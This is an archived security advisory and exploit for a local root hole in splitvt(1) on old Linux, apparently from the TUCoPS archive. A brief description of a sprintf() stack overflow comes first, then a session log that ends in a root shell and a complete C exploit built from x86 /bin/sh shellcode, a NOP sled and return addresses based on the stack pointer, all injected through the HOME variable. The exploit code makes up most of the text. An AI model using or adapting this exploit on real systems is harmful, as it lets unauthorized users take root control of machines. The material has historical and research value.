Vulnerability
splitvt(1)
Affected
Linux 2-3.X
Description
Local users can obtain superuser privelages.
Bug Synopsis: A stack overflow exists via user defined unbounds
checked user supplied data sent to a sprintf().
crimson~$ cc -o sp sp.c
crimson~$ sp
bash$ sp
bash$ splitvt
bash# whoami
root
----------------------------------------------------------------------------
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
putenv(eggplant);
system("/bin/bash");
}
----------------------------------------------------------------------------
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
